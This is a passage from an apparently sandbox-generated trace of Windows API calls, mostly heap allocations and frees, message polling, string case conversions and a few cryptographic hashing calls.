returned 0xd [0251.631] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.631] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0251.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0251.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0251.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0251.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0251.632] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0251.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0251.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0251.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0251.632] CryptHashData (hHash=0xaa59a0, pbData=0x24b18e8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0251.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0251.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0251.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0251.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0251.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0251.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0251.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0251.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0251.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0251.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0251.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0251.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0251.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0251.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0251.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0251.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0251.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0251.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0251.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0251.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0251.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0251.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0251.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0251.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0251.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0251.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0251.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0251.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0251.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0251.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0251.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0251.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0251.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0251.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0251.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0251.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0251.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0251.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0251.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0251.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0251.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0251.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0251.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0251.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0251.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0251.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0251.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0251.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0251.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0251.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0251.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0251.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0251.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0251.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0251.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0251.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0251.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0251.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0251.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0251.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0251.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0251.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0251.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0251.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0251.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0251.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0251.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0251.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0251.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0251.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0251.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0251.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0251.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0251.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0251.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0251.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0251.636] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0251.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0251.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0251.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0251.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0251.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0251.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0251.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0251.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0251.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0251.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0251.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0251.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0251.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0251.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0251.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0251.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0251.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0251.637] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0251.637] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0251.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0251.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0251.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0251.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0251.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0251.638] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0251.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0251.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa418 [0251.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0251.638] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0251.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0251.638] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0251.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0251.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0251.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0251.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0251.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0251.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0251.638] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0251.639] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0251.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0251.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0251.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0251.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0251.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0251.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0251.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0251.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0251.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0251.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0251.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0251.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0251.639] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0251.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0251.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0251.640] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0251.640] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0251.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0251.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0251.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0251.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0251.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0251.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0251.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0251.640] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0251.640] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0251.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0251.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0251.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0251.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0251.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0251.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0251.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0251.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0251.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0251.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0251.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0251.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0251.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0251.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0251.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0251.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0251.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0251.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0251.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0251.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0251.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0251.642] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0251.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0251.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0251.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0251.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0251.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0251.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0251.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0251.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0251.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0251.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0251.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0251.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0251.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0251.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0251.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0251.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0251.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0251.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0251.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0251.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0251.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0251.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 